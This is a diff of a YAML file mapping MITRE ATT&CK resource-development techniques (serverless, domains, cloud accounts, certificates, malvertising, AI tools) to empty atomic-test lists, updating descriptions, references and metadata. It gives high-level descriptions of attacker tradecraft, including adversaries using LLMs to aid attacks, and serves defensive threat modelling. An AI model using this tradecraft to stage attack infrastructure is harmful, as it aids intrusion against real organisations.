       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -51364,15 +52043,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -51404,17 +52086,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -51467,11 +52148,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -51507,7 +52187,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -51556,43 +52236,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -51605,18 +52254,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -51638,7 +52318,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -51654,8 +52334,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -51677,7 +52355,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -51697,8 +52375,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -51737,7 +52413,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -51758,8 +52434,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -51789,7 +52463,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -51826,8 +52500,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -51849,7 +52521,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -51871,8 +52543,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -51909,7 +52579,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -51931,8 +52601,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -51994,7 +52662,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52016,7 +52683,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52034,8 +52701,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52070,7 +52735,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52089,33 +52754,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52125,10 +52788,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52136,9 +52808,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -52189,11 +52860,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52206,7 +52876,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52241,22 +52911,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -52277,7 +52950,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -52316,6 +52989,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52371,7 +53048,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -52429,7 +53105,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -52509,7 +53184,6 @@ resource-development:
